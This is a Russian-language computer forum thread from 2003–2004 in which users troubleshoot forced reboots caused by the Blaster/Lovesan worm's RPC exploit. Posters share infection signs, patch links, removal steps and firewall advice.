Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Microsoft Windows 2000/XP (http://forum.oszone.net/forumdisplay.php?f=6)
-   -   [решено] Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM), a также lsass.exe (http://forum.oszone.net/showthread.php?t=6849)

AnimaD 12-08-2003 08:28 35216

Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM), a также lsass.exe

Ошибка:
Система завершает работу. Сохраните
данные и выйдите из системы. Все
несохраненные изменения будут
потеряны. Отключение системы вызвано
NT AUTHORITY\SYSTEM

Время до отключения 00:01:00

поскольку произошла непредвиденная
остановка службы Удаленный вызов
процедур (RPC)

Что делать?

Решение проблемы изложено вот здесь!

Помогите, пожалуйста!
вчера вечером вдруг снова появилась эта чума.
Win XP ENG, стоят все заплатки с самого начала, и до вчерашнего дня все было ОК.
внешнее проявление точно как BLAST, только теперь ссылается
на WINDOWS\System\lsass.exe

Компьютер заражен червем Worm.Win32.Sasser

Sergius 12-08-2003 08:39 35217

системная ошибка и перезагрузка

Proantivirus Lab сообщает о появлении нового опасного и быстро распространяющегося (в том числе и по России) червя, использующего недавно открытую дырку в RPC во всех ОС семейства NT. Заражение удаленное, через 135-й порт, исполняет команды из-под Local System.

Признаки заражения:
- Наличие файла msblast.exe в каталоге %WinDir%\system32.
- Сообщение об ошибке (RPC service failing) приводящее к перезагрузке системы.
- Наличие в системном реестре ключа HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill

Настоятельно рекомендуется обновить антивирусы и/или пропатчиться.

rus alexey 12-08-2003 09:58 35215

AUTHORITY\SYSTEM проблемка

By NNM.ru
Цитата:

Ахтунг! Срочно качаем заплату распространяющуюся на все версии виндов (англ: http://www.microsoft.com/technet/tre...n/MS03-026.asp или рус: http://download.microsoft.com/downlo...80-x86-RUS.exe)! Дыра была известна уже давно, но кто то шустрый сделал вирь опираясь на эту дырочку.

При обращении к svhost данная хрень вешает Вашу машину... Вещь не приятная... Тем, кто сидит за firewall`ом бояться нечего, но в качестве профилактики.
Там картинка есть, симтомы точь-в точь: http://www.nnm.ru

rus alexey 12-08-2003 10:21 35218

системная ошибка и перезагрузка

Качай заплату

http://download.microsoft.com/downlo...80-x86-RUS.exe

Ginger 12-08-2003 13:25 35219

я удалила файл в Safe Mode и вроде пока сижу....
а как червь распространяеться? я ничего не качала...

Guest 12-08-2003 13:26 35220

http://forums.lair.ru/cgi-bin/ikonbo...ST;f=2;t=8080;

mb 12-08-2003 17:25 35221

Червь - AUTHORITY\SYSTEM проблемка

Для тех кто не хочет или не может вручную ковыряться в реестре *можно скачать утилитку
W32.Blaster.Worm Removal Tool
от Symantec, которая вычистит эту хрень. Затем конечно нужно установить патч от M$
Вообще - эпидемия какая-то, прямо codered для ХP, какой-то. Практически все мои XP-знакомые, кто не ставил файерволл и выходил в интеренет вчера и сегодня, заполучили эту гадость.
:(

bgg0408 12-08-2003 17:59 35222

У меня в 2k(и XP) svchost дохнет времы от времени при коннекте к Инету. Это случайно не из-за этой дыры в RPC?

Добавлено:

to rus alexey
Вот это забыл сказать для пользоателей W2k:
http://download.microsoft.com/downlo...80-x86-ENU.exe

Ginger 12-08-2003 20:31 35223

люди никто не выяснил, как эта гадость цепляется?
я ничего с инета не качала. вобще только наголо ХР переставила...

Chris 12-08-2003 22:07 35224

читайте
http://www.proantivirus.com/info/1/181_1.html
http://www.proantivirus.com/info/1/180_1.html

Asfr 12-08-2003 23:44 35225

Ginger вирус червь заражает удаленно через 135 порт .Удалите  msblast.exe и обязательно поставьте патч заплатку чтобы эта гадость вновь удалённо не проникла к вам на машину

Ginger 13-08-2003 00:35 35226

fSergey
Цитата:

Удалите  msblast.exe и обязательно поставьте патч заплатку
это не помогло. пришлось переустанавливать систему. хотя я ничего не потеряла... если только время....

ArtemD 13-08-2003 09:36 35227

Ginger
если бы ты вовремя прикрылась фаерволом, то у тебя бы не было этой проблемы. так что в очередной раз идем перечитывать топик "Файеры"

Ginger 13-08-2003 12:47 35228

ArtemD
я пользуюсь только ХР-шным - для меня, лучше фаера нет.
вспомнила, что сразу после переустановки и подключения забыла вкдючить фаер.... всё так шустро...

mb 13-08-2003 12:59 35229

Переставлять не надо.
Отключаешься от сети, в сэйф моде удаляется вся эта дрянь из C:\windows\ , в реестре -run, затем патч, и включение файера. Потом можно опять в сеть При этом очень интересно смотреть на логи файервола.
Достаточно  минимального времени  в интернете  без патча или файервола, чтобы заразиться. Я вчера наблюдал по логам, как с разных адресов ко мне рвутся на 135-й порт и все это с интервалом 1-2 мин.

mb 13-08-2003 13:50 35230

Ginger
Я уже поправил несколько машин у знакомых (еще вчера начал :)  )
Там всё помогает.
Только не стоит ставить заплатку на инфицированную машину или в  интернет выходить на непропатченной (или без файервола) машине,- заразишься снова, причем в течении нескольких секунд.

Добавлено:

Во как!
Цитата:

Для того, чтобы помешать пользователям скачать соответствующий патч с сайта Microsoft, червь может предпринимать, начиная с 16 августа, DDOS-атаки на windowsupdate.com
Диалог Наука

Поторопитесь кто не успел!

bgg0408 14-08-2003 05:22 35231

to mb
Я уже думал об атаке на Мелкософт

Если дыра есть и Вы лезете в Инет и винда говорит типа сдох svchost.exe, то значит вирус пытался залезть к Вам, но не смог(кстати, и не сможет!!! но другой???)-> срочно качайте апдейт. Я проверял на нескольких машинах - червь криво написан и не везде может установиться.
Если червь проявил, читайте весь топик!!!

Blast 14-08-2003 07:11 35232

Только что прочитал о том что обнаружена новая модификация червя
Цитата:

Технологически новая модификация ничем не отличается от
оригинала. Изменения коснулись только имени файла-носителя червя
(TEEKIDS.EXE вместо MSBLAST.EXE), технологии его упаковки (утилита FSG
вместо UPX) и текстовых строк внутри программного кода, которые содержат
ненормативную оскорбительную лексику в адрес Microsoft и антивирусных
компаний.

Eglantine 15-08-2003 02:53 35233

Ребята! Помогите, чайнику!
Эти окошки выскакивали и выскакивали все чаще и чаще, отключив кабельный модем я проверила через DrWeb на вирусы - чисто, запустила Ad-aware - ничего. Вечером компьтер не включался с кабелькой, и я запустила Windows Update, потом мониторе было окно, что Windows Update прошло успешно.
Все вроде заработало. Я еще раз проверила компьютер антивирусниками DrWeb, Касперским, потом Symantec нашла, но ни один из них не обнаружил никаких признаков вируса.
Окно больше не выскакивает, но на сегодня проблема такая заплатка не ставиться, ругается, многие параметры (или как их там) Windows не загружает, ругается, Firewall не подключается. Сегодня я решила запустить Дефрагментацию диска, когда открыла, то увидела, что у нас на компьютере, вместо 45% свободного места, сейчас только 3%.
И появилась папка на диске С: 40dc704ed2111e6d2a8a5f5d6c9da0be
Я думаю, что это Update сохранило старые данные. Пробовала ее удалить - не удаляется, если всей папкой, начинается все нормально, но буквально через пару секунд окошко удаления просто исчезает, а если зайти в папку, то по одному файлы (в основном .dll) можно удалить, но как-то так медленно оно удаляется, что аж жутко, вдруг что нужное удаляю. И незнаю что сней делать - папка эта на 214MB.

Ginger 15-08-2003 04:06 35234

Eglantine
Цитата:

40dc704ed2111e6d2a8a5f5d6c9da0be
такое имя для папки виндовского апдейта весма подозрительно.
а удалить попытайтесь в Саф Моде

Eglantine 15-08-2003 06:56 35235

Ну это я предполагаю, что это папка виндовского апдейта, может еще что, но я из нее несколько фалов удалила, ничего компьютер пока работает и еще когда удаляешь по одному файлы, их нет потом в корзине. Вообщем кошмар какой-то, незнаю что с ней делать. Вы думаете что надо удалять? Пожалуйста, объясните поподробнее как это удалить в Саф Моде?
Спасибо огромное.

[s]Исправлено: Eglantine, 7:59 15-08-2003[/s]

[s]Исправлено: Eglantine, 8:01 15-08-2003[/s]

Siava one 15-08-2003 08:35 35236

Ginger
Цитата:

40dc704ed2111e6d2a8a5f5d6c9da0be
Это после неудачной попытки установки заплатки, такие папки именно Windows update оставляет.

Eglantine
При загрузке компа, перед появлением лого, нажимай F8, можно много раз нажимать, пока не попадёшь в загрузочное меню, там есть пункт "Безопасный режим" или Safe Mode - грузись в него и попробуй поудалять мусор лишний.
Убивание вируса:
1. ОБЯЗАТЕЛЬНО нажми CTRL+SHIFT+ESC, если в списке процессов есть файл msblast.exe, то ЗАВЕРШИ ЕГО!
2. Пуск-выполнить-msconfig-автозагрузка, найди файл msblast.exe и сними с него автозагрузку.
3. В папке \windows\system32 найди этот самый msblast.exe и УБЕЙ ЕГО!

После всех этих извращений попытайся установить заплатку заново, не перегружаясь.
Если чего, у меня все заплятки к Win2000 и WinXP есть, в том числе и eng.

Guest 15-08-2003 12:05 35237

У нас в локальную сеть тоже попал червь,  за несколько минут все уже заразились. Никто не сообщил на форуме что он удаляет что либо на  винте. У всех нас были отформатированы партиций под FAT32, NTFS червь не трогал. Возможно это модификация.

Siava one 15-08-2003 12:07 35238

Guest
Да ничего он вроде не удаляет. Сидит себе "мирно" в system32 и вызывает ошибки в службе RPС.

Добавлено:

И ещё, червь этот кажись LoveSan зовётся.

Добавлено:

А группа NT AUTHORITY\SYSTEM содержит в себе Debugger Users, которые могут
Цитата:

Debugger users can debug processes on this machine, both locally and remotely
Чем-то трояна напоминает :biglaugh:

Ginger 15-08-2003 13:57 35239

Siava one
Цитата:

Это после неудачной попытки установки заплатки, такие папки именно Windows update оставляет.
у меня, наверно просто никогда не было неудачных попыток...  :)

Цитата:

Чем-то трояна напоминает
да в ХР одни трояны.... М$-вские...

Guest
здесь, наверно, у всех НТФС, поэтому никому ничего не форматировали.

Eglantine 15-08-2003 20:43 35240

Попробовала удалить эту папку в Safe Mode, всей папакой не удаляется. Зашла в папку и удалила все файлы из нее, но там есть несколько папок: asms, download, ic, new, update - которые не удаляются, не открываются, при наводе на них курсора выходит надпись, что папка пустая. Вообщем когда пытаюсь открывать эти папки, выходит окошко, что C:\40dc704ed2111e6d2a8a5f5d6c9da0be\asms is not accessible.
Access is denied.
А если пробую удалять, то Cannot delete asms: Access is denied. Make sure the disk is not full or write-protected and that the file is not currently in use.
И место на диске увеличилось всего на 1%, сейчас стало 4%, но вроде больше ничего постороннего нет.

По всем этим пунктам, ничего похожего нет:
Убивание вируса:
1. ОБЯЗАТЕЛЬНО нажми CTRL+SHIFT+ESC, если в списке процессов есть файл msblast.exe, то ЗАВЕРШИ ЕГО!
2. Пуск-выполнить-msconfig-автозагрузка, найди файл msblast.exe и сними с него автозагрузку.
3. В папке \windows\system32 найди этот самый msblast.exe и УБЕЙ ЕГО!

Пыталась снова установить заплатку, но безуспешно, опять ругается: KB823980 Setup Error
Setup could not verify the integrity of the file Update.inf.
Make sure the Cryptographic service is running on this computer.

Может это троян мозги морочит? Вообщем, не так давно Dr.Web обнаружил у меня на компе трояна в двух местах, но лечить не предложил, я все излазила, пыталась найти как вылечить ничего не получилось и я их просто удалила. После этого проверяла Dr. Web неоднократно и Касперским и еще Бог знает чем, ничего не обнаруживалось больше. Незнаю может это все-таки где сидит?
Кошмар какой-то.

Eglantine 15-08-2003 22:28 35241

Вот сейчас залезла в сервисы проверить включен ли Cryptographic, он-то включен, но заметила там кое-что интересное, раньше мне кажется этого не было.
Вот:
Name: Error Reporting Service
Description: Allows error reporting for services and applictions running in non-standart environment.
Status: Started
Startup Type: Automatic
Log On As: Local System

А может все эти проблемы сейчас от этой строчки? А что с ней делать?

mb 15-08-2003 23:33 35242

Eglantine
Всё не то. С самого начала.
Не надо было ничего скачивать на зараженную машину. Не стоило надеяться на антивирусы даже с регулярными обновленими. Большинство из них абсолютно ничего не знало о бластере вплоть до 11 августа. Насколько я знаю Семантек выпустил обновление обнаруживающее  вирус только 11 -го поздно вечером. Касперский и д-р Веб несколько позже. пытаться найти  вирус  с обновлениями раньше 12-го августа  бессмысленно.
Самое главное что надо было сделать - это убить процесс выкинуть blast.exe из авторуна в реестре и ВКЛЮЧИТЬ ФАЙЕРВОЛ. Заплата в такой ситуации- дело не первостепенное.
главное -удалить вирус и поставить Файервол потому что он закрывает этот поганый epmap(135 порт).
Надеюсь system restore ты не отключала?
если ты пыталась установить обновление оно обязано было сделать контрольную точку.
Вернись к ней, отключи ресторе,  очисти от всех контрольных точек (cleanmgr.exe), удали вирус отовсюду  и включи файервол, хотя бы встроенный. Затем можешь поставить патч. Включи ресторе - сделай контрольную точку и снова очисть диск - от всех контрольных точек кроме последнй  и только после этого подключай кабельки и модемы :)

PS C:\40dc70..  это папка незавершившегося  обновления

Вот такая, мама, здесь у нас программа

Eglantine 16-08-2003 00:40 35243

Надеюсь system restore ты не отключала?
если ты пыталась установить обновление оно обязано было сделать контрольную точку.
Вернись к ней, отключи ресторе,  очисти от всех контрольных точек (cleanmgr.exe), удали вирус отовсюду  и включи файервол, хотя бы встроенный. Затем можешь поставить патч. Включи ресторе - сделай контрольную точку и снова очисть диск - от всех контрольных точек кроме последнй  и только после этого подключай кабельки и модемы.

_____________________________________________-

System restore я не отключала.
Пожалуйста подскажите, где эта котрольная точка, я обычный чайник и если не сложно объясните поподробнее. PLS

Добавлено:

И еще подскажите пожалуйста, на диске С папка I386 (С:\I386), она и до этого всего была, но сейчас она просто огромная стала. Я незнаю, ведь такая же папка есть в С:\Windows\I386 можно что-то из нее удалять или можно ее всю удалить, вообще она должна быть на С?

mb 16-08-2003 01:15 35244

Eglantine

пуск-программы-стандартные-служебные -восстановление системы
Запусти программу и ты увидишь что-то наподобие календаря, в котором жирным цветом будут выделены дни когда создавались контрольные точки (в один день их может быть несколько). Выбери последний (или какой захочешь) и нажми восстановить. Все будет восстановлено плоть до того состояния когда была создана эта к.т.
Имей ввиду, восстановление может затронуть все диски и если у тебя в этот промежуток времени (от сегодня до контрорльной точки) где-то были записаны, какие-либо важные даннные -они исчезнут. Чтобы избежать этого, надо на вкладке - мой компьютер-свойства -восстановление системы удалить наблюдение со всех дисков кроме системного (обычно диск с:/  )
Эта операция (восстановление системы) полностью обратима- т.е. если после восстановления системы тебе что-то не понравится, ты всегда посредством той же программы, сможешь отменить это восстановление *Там же можно самому принудительно создавать контрольные точки, обычно это делается перед каким либо сильными действиями, которые могут задеть систему.
Если что-то непонятно не забывай использовать клавишу f1 там все очень подробно описано

Добавлено:

папка I386- содержит файлы дистрибутива.
При наличии загрузочного диска XP, без неё вполне можно обойтись

[s]Исправлено: mb, 2:19 16-08-2003[/s]

Siava one 17-08-2003 12:30 35245

xcv
Кроме микрософтовских заплаток есть утилиты от касперского и symantec.

Почитай вот эту статейку: http://www.3dnews.ru/editorial/lovsan/

А это с новостей касперского: http://www.kaspersky.ru/news.html
Цитата:

Признаками заражения компьютера являются:
- Наличие файлов "MSBLAST.EXE", "TEEKIDS.EXE" или "PENIS32. EXE" в системном каталоге Windows (обычно WINDOWS\SYSTEM32\)
- Внезапная перезагрузка компьютера после соединения с Интернетом каждые несколько минут
- Многочисленные сбои в работе программ Word, Excel и Outlook
- Сообщения об ошибках, вызванных файлом "SVCHOST.EXE"
- Появление на экране окна с сообщением об ошибке (RPC Service Failing)

Blast 20-08-2003 07:59 35246

Как вам такая новость?
Цитата:

"Welchia": антивирусный вирус

Обнаружен новый сетевого червя "Welchia", который ищет компьютеры, зараженные "Lovesan" ("Blaster"), лечит их и устанавливает заплатку для Windows.

"Welchia" принадлежит к разряду вирусов, несущих определенную гуманитарную функцию. Они атакуют компьютер, проникают в систему, но не наносят какого-либо вреда. Наоборот, они удаляют другие вредоносные программы и иммунизируют компьютеры.

"Welchia" проводит заражение подобно червю "Lovesan": через бреши в системе безопасности. Однако, в отличие от него, "Welchia" атакует не только уязвимость в службе DCOM RPC, но также брешь WebDAV в системе IIS 5.0 (специальное программное обеспечение для управления web-серверами). Для проникновения на компьютеры червь сканирует интернет, находит жертву и проводит атаку по портам 135 (через брешь в DCOM RPC) и 80 (через брешь WebDAV). В ходе атаки он пересылает на компьютер свой файл-носитель, устанавливает его в системе под именем DLLHOST.EXE в подкаталоге WINS системного каталога Windows и создает сервис "WINS Client".

После этого "Welchia" начинает процедуру нейтрализации червя "Lovesan". Для этого он проверяет наличие в памяти процесса с именем "MSBLAST.EXE" или модификаций, принудительно прекращает его работу, а также удаляет с диска одноименные файлы. Далее "Welchia" сканирует реестр Windows для проверки установленных обновлений. В случае, если обновление, закрывающее уязвимость в DCOM RPC не установлено, червь инициирует процедуру его загрузки с сайта Microsoft, запускает на выполнение и, после успешной установки, перегружает компьютер.
Наконец, в "Welchia" существует механизм самоуничтожения. Червь проверяет системную дату компьютера и, если текущий год равен 2004, удаляет себя из системы.

Уже сейчас распространение "Welchia" достигло глобальных масштабов. При сохранении этой тенденции можно считать, что в течении недели червь сможет полностью погасить эпидемию "Lovesan". "Приходится констатировать, что и в интернете работает пословица "Клин клином вышибают". Оказывается, самый эффективный способ борьбы с вирусом - вирус.
Извините за длинную цитату... мне по почте прислали, а линк долго искать, сори...

lossen 20-08-2003 21:32 35247

Млин кажется и я его словил. Просто как-то я разговаривал с Макслой по асе и он сказал мне, что кажется подхватил вирус и дал мне линк на этот топик. Я почитал запомнил, что-то про svhost 8). Вчера сидел в инете и мой svhost.exe "допустил недодопустимую...". я отрубился от инета. Запустил Ad-Aware 6 он нашел два троянца (или че там он ищет? 8)) потом Каспера - он ничего не нашел (может из-за того что я не обновлял базу антивирусную). Потом я пошел в смотреть телик, но комп не выключал, и позже комп сам вырубился... Я поискал файлы msblast.exe и teekids.exe и к счастью ничего не нашел и в автозагрузке ничего нет... Может это не он? Но интересно что это было?
А заплатку я сегодня скачаю для своей win2k rus

Blast 21-08-2003 06:52 35248

lossen
Цитата:

файлы msblast.exe и teekids.exe  к счастью не нашел
В последней "С" модификации исполняемый файл вируса может называться...... PENIS32.exe :)

ArtemD 16-09-2003 07:39 35249

FAQ по уязвимостям в DCOM/RPC

Leha 13-11-2003 15:21 35250

После прочтения всей темы в целом, спешу сообщить, что кроме трех обсуждаемых "обличий" червя появилось еще одно - mslaugh.exe

Semchik 08-12-2003 14:46 35251

Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)

Пытаюсь запустить программу Windows2000-KB823980-x86-RUS.exe - а ничего не получается, т.к. просит установления пакета обновления 2. Объясните - что это такое и где это взять?
Заранее благодарю.:biglaugh:

Giorgievich 08-12-2003 14:55 35252

Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)

Цитата:

Цитата Semchik
Windows2000-KB823980-x86-RUS.exe - а ничего не получается, т.к. просит установления пакета обновления 2. Объясните - что это такое и где это взять?

На странице скачивания этого патча сказано, что для того чтоб установить этот патч на компьютере с системой Windows 2000, там должен быть установлен как минимум Service Pack 3. Скачать его можно отсюда

Guest 30-12-2003 17:36 35253

у меня файла msblast.exe в системе не было, долго мучился, но в конце концов нашел файл svhost1.exe который и является телом этого грёбанного вируса, также советую в реестре искать строку "configuration loading", "svhost1.exe" и удалать безжалостно. На пока вирус не обнаруживается...

userxp 03-01-2004 22:23 35254

новый способ избавиться от перезагрузок:
нажымаете правой кнопкой мыши на *мой комп* >manage>services and applications>services>далее ищем в списке (RPC) первый открываем>recovery>first failure>restart the services жмём выполнить. тоже самое со вторым(RPC). и закрываем все  окна .  
удачи.

Demonisiuns 05-01-2004 00:11 35255

Цитата:

*мой комп* >manage>services and applications>services>далее ищем в списке (RPC) первый открываем>recovery>first failure>restart the services жмём выполнить. тоже самое со вторым(RPC).
А на русском можешь ? Не всегда ж мне виндовс стирать.

Vadikan 05-01-2004 09:43 35256

Demonisiuns
Пуск->Выполнить->compmgmt.msc->Ок->Службы и Приложения.
Цитата:

Не всегда ж мне виндовс стирать.
А зачем стирать? Надо тему перечитать внимательнее просто напросто.

Absolut 21-01-2004 20:26 35257

могу только посочувствовать...
эта проблема у меня тоже была...
мучаться я с ней не стал...
поскольку времени на борьбу с неизвестным Х-вирусом или трояном не было.
скажу что
Цитата:

*мой комп* >manage>services and applications>services>далее ищем в списке (RPC) первый открываем>recovery>first failure>restart the services жмём выполнить. тоже самое со вторым(RPC).
или по русски это сказать не перезагрузку выбрать а рестарт службы RPC....
не делайте этого... бесполезно...
глючить будет еще хуже...
при таком раскладе уже и так все ясно что сбои будут все чаще и чаще до такого момента когда перестанет загружаться комп.
(только в безопасном режиме будет работать поскольку процессы запускаемые svchost работают только в нормальном)
в фаерволе проверьте... контролирует ли он важные порты зарезервированые системой...
особенно порт DCOM (135) на TCP и UDP...
в Agnitum Outpost Firewall 1 версии это надо сделать вручную
а во 2 версии она уже прописана.

magda 10-02-2004 13:57 35258

Flexx
Цитата:

А что антивирус нынче не в моде?
Я только что по теме совсем в другом разделе (Программное обеспечение - Опера на ХР) только и сообразила, что это у меня такое было, меня Вадикан сюда прислал. Что самое интересное, Каспер (лицензионный с регулярным обновлением) возникает почему-то почти исключительно в оффлайне, что-то там в папке C:\Recovery\TFT... заражено вирусом Вин.Лавсан, лечение невозможно, объект удален. Сканирую весь диск - молчание в тряпочку. Через некоторое время (неделя, 2) - опять Каспер верещит. И опять история повторяется.

А дело все в том, что я где-то в ноябре переинсталлировала систему, честно до переустановки антивиря к инету не подключалась, как только подключилась - сразу обновила антивирь, а вот виндовские апдейты-то.... И получила принудительный перегруз *(сабж) ровно через пять минут. Самое смешное, что у нас прокси выставлен ИСКЛЮЧИТЕЛЬНО на порт 3128, к хосту своего сайта я через 2082 подключиться не могу, а вот черви - пожалуйста. На кой хрен тогда тот прокси?????

Так вот, верещит Каспер почему-то часто в оффлайне (речь идет о лэптопе, который я иногда приношу на работу), а недавно за очень короткий промежуток времени произошло 2 события: 1) в один прекрасный день, когда долго сидела в инете, у меня вдруг обнулился IP :o . Ну, енто дело я автовосстановила и списала на глюки, которые в тот день у нас по всей локалке были.  2) А потом как-то Каспер впервые заверещал во время подключения к инету, а потом у меня вдруг открылся Аутлук Экспресс *с каким-то адресом в адресной строке (по умолчанию для создания почтовых сообщений используется Ворд), так что я сразу поняла, что дело нечисто и выдернула шнурок из дырочки :). Я так понимаю, зараженных становится все меньше, и авторы червя пользуются этими ценными для них последними могиканами.

ЗЫ. Теперь понимаю, чего я тогда сразу после переустановки Винды не смогла включить автоапдейт. Так с тех пор и не апдейтилась - не думала, что заражение возможно при том, что сидишь на прокси и пользуешь антивирь. Так что при бреши в ОСи тот антивирь до одного места.

Посему страшно благодарна Вадикану за то, что указал мне на эту тему, поскачивала все патчи, лечения и т.п., теперь может и автоапдейт включу :). Всем, у кого проблемы, советую полностью прочитать эту тему, тут уже есть ВСЕ, что надо. Если Вам не хватает - идите лечитесь (не антивирем и не патчами, а в поликлинику).

:oszone:

[s]Исправлено: magda, 14:03 10-02-2004[/s]

[s]Исправлено: magda, 14:05 10-02-2004[/s]

Vadikan 10-02-2004 19:59 35259

Цитата:

Цитата magda
не думала, что заражение возможно при том, что сидишь на прокси и пользуешь антивирь.

Это большое заблуждение, и многие по незнанию поплатились. Достаточно было перед выходом в Инет просто включить встроенный в ХР фаервол, правда Ginger ;-)))

Sergggg 18-02-2004 23:10 35260

Вот скажите мне люди умные, служба эта Blast`ом останавливается(RPC), но она то ведь жизненно необходима для Windows Installera! У меня проблемы с ним после заражения- не хотят запускаться установщики: кто нить сталкивался с этим? Заранее спасибо.

Vadikan 19-02-2004 01:38 35261

Sergggg
Из вашего сообщения неясно был ли (корректно) удален червь. Инструкция по удалению.

Sergggg 19-02-2004 16:56 35262

Vadikan
Удалял я его как обычно:) Установил update, проверил утилитой clrav.com, но к моему удивлению она ничего не нашла. Покопался сам в реестре и в папочке System32-ничего!

Vadikan 20-02-2004 00:48 35263

Sergggg
Цитата:

Удалял я его как обычно Установил update, проверил утилитой clrav.com
Данная последовательность нескольно необычна, и не кажется мне правильной.

Yoghurt 20-02-2004 08:26 35264

У меня такой вопрос (с целью выяснения дальнейших действий). Тут обнаружил я как-то пятый svchost.exe. Странно, думаю, третий системный, ну и один из них остановил. :biggrin: Тут же появилось известное окошко nt/authority... перезагрузка через минуту и т.д. Инет подключен не был. В общем хотелось бы знать, что с этим добром делать, ну всмысле, требуется ли лечение?

[s]Исправлено: Yoghurt, 17:44 20-02-2004[/s]

Vadikan 21-02-2004 00:40 35265

Yoghurt
В общем, хотелось бы порекомендовать прочтение самого первого поста в теме. И заодно фильтр по svchost.

Yoghurt 21-02-2004 09:56 35266

Vadikan
Всю эту тему я не раз перечитывал, ответа здесь нет. А по поводу svchost'овых тем: там упоминается о появлении окна NT/AUTHORITY SYSTEM при завершении одного svchost'a, но ответа не дается. С инетом проблем у меня нет. Может быть, я некорректно задал вопрос: всегда ли появление этого окна связано с червем (неужели, никто не хочет это проверить)?

Vadikan 22-02-2004 12:21 35267

Yoghurt
Как минимум в двух темах про svchost есть мои посты со ссылкой на статью в М$ КВ, где описано как определить процессы стоящие за каждым из svchost'ов. Хорошо, я сейчас проверю выдается ли сообщение при убивании процесса ;-) Ответ дам часиков через 12.

Yoghurt 22-02-2004 17:27 35268

Vadikan
ОК, подожду. :)
Цитата:

Как минимум в двух темах про svchost есть мои посты со ссылкой на статью в М$ КВ, где описано как определить процессы стоящие за каждым из svchost'ов.
Да это я уже определил (правда, по-своему). Вроде все чисто.

Vadikan 23-02-2004 00:41 35269

Да, появляется окно. Видимо червь просто убивал процесс, отсюда и окно. Ну а раз все чисто, то и беспокоиться не о чем ;-)

Yoghurt 23-02-2004 10:07 35270

Vadikan
Ладно, пасиб за содействие. :)

[s]Исправлено: Yoghurt, 10:12 23-02-2004[/s]

Danchik 29-02-2004 18:55 35271

у меня тоже происходила остановка службы RPC ... и я посмотрел как надо удалить вирус выше указанными способами, до этого у меня уже были последние апдейты, но вируса я никакого не обнаружил ??? и не пойму почему у мнея происходила остановка службы RPC ??? потом я включил брандмауэр XP - шный и у меня больше не вылазеет эта надпись и перезагрузки соответственно не происходит ... но как только я выключу брандмауэр, то опять начинается эта остановка службы RPC и перезагрузка =(((...
просто при включенном брандмауэре мне не отправляются нетсенды и радио через винамп не послушаешь

Vadikan 01-03-2004 01:39 35272

Danchik
Так надо обновление установить. Читайте самый первый пост в теме. Обновление уже входит в Пакет Обновлений 1 (Update Rollup 1) http://support.microsoft.com/default...;Product=winxp

Lit 01-03-2004 12:51 35273

Sergggg
Увидел проблему похожую на мою ХР Р (анг) стоит почти 2 года столько же Интернет Ни каких пробле не было Две недели назад стало похоже что поймал msblast Однако ни msblast, teekds и т. п.  w32.worm.blaster и др. ничего не нашли. К тому  же перестали работать установщики и некоторы утилиты Их окна появляются и исчезают через несколько секунд. Пробовал вернуть систему назад с System Restore. Комп выключаться перестал. Но проблема с установщиками и regedit осталась Я не специалист в этом деле. Можно ли востановить работу установщиков?

Guest 06-03-2004 21:34 35274

У меня был msblast но я symantec'овскую утилиту запустил, выкинул и она написала что червь успешно выброшен и файлы с ним удалены. но rpc почемуто все равно останавливается. тогда я включил чтобу она перезапускалась через 0 мин. после выключения. теперь комп не перегружается но через пару минут в инете винд начинает глючить. причем он не тормозит а делает всякие ошибки например перестает копировать текст, в explorere не работает функция открыть в новом окне, при выключении он зависает и т.д. Что делать?

Vadikan 06-03-2004 21:45 35275

Guest 62.183.50.*
Фаервол установлен?

Guest 07-03-2004 09:29 35276

нет

Vadikan 07-03-2004 18:50 35277

Guest 62.183.15.*
Ну тогда читаем самый первый пост в теме еще раз ;-)

Guest 16-03-2004 01:23 35278

При подключении к интернет постоянно приходится вводить пароль так-как идет сообщение о том что неправильный пароль .Перепробовал кучу дозвонок думал в ней дело всё то-же самое копался в настройках но там кроме как "сохранить пароль " .Помогите а то я уже задолбался каждый раз пароль вводить.

Vadikan 16-03-2004 02:51 35279

Guest 217.23.178.*
Перезагрузки же нет? Так зачем постить в этой теме?

Guest 28-03-2004 21:33 35280

Кое как избавился от ловсана, причём переустановил winXP с сервиспаком  включил файаволл и ничего не помогло ловсан залез чем только его не лечил бесполезно он появляется вновь и вновь причём антивирусный монитор его не лечит, и очистка всех возможных мест автозагрузки тоже не помогла...
надежда только на заплатку

Warriornew 06-04-2004 23:57 35281

Без заплатки можно отключить через Панель управления/Администратирование/Службы Удаленный вызов процедур (RPC), вкладка восстановление, указать действие при збое - "не выполнять никаких действий" во всех случаях

ArtemD 14-04-2004 10:21 35282

"Четыре новых уязвимостей в RPC/DCOM в Microsoft Windows 4.0/2000/XP/2003"
Опасность: Критическая

Vadikan 14-04-2004 15:35 35283

ArtemD
Спасибо, я уже проинформировал участников о 4 новых и 1 обновленном апдейтах в прикрепленной теме "Важнейшие обновления системы"

Guest 21-04-2004 03:33 35284

Весьма тупой вопрос. Как закрыть во втором аутпосте определенные порты?

Vadikan 21-04-2004 04:50 35285

Guest 80.243.65.*
Вопрос не то чтобы тупой, он просто не по адресу. Он бы и не возник, если б вы почитали справку к программе. http://forum.oszone.net/topic.cgi?fo...&topic=666

Guest 27-04-2004 18:37 35286

Народ, кто подскажет , как убить mslaugh : сидит только в автозагрузке, но не загружается, в реестре нет, в системной папке нет, в процессах нет, и , в принципе, ничего не делает, вроде. Не перегружает  машину точно. Че делать?

DubleZero 27-04-2004 19:03 35287

Воспользоваться Симантековской утиллитой для удаления червя.

Guest 27-04-2004 23:30 35288

не убивается и не находит этот лаф fixblast

Blast 28-04-2004 08:06 35289

Guest
Ну хорошо, если ты знаешь где он сидит, то почему бы его просто не удалить? а не делает ничего так как прошел его срок активности давно...

Guest 29-04-2004 00:34 35290

а как его удалить из автозагрузки? Его не видит регклинер, его нет в реестре,нигде я его не могу найти. Кстати, он никогда и не работал, я его случайно увидела, но что его не было-это точно. Бластом болели, вылечились, защиту поставили. Откуда ж эта херня взялась?

Blast 29-04-2004 07:08 35291

Guest
что-то я совсем тебя не пойму... может не выспался...
Цитата:

я его случайно увидела
увидела где? откуда тогда взялось утверждение что
Цитата:

сидит только в автозагрузке

plabor 01-05-2004 11:57 35292

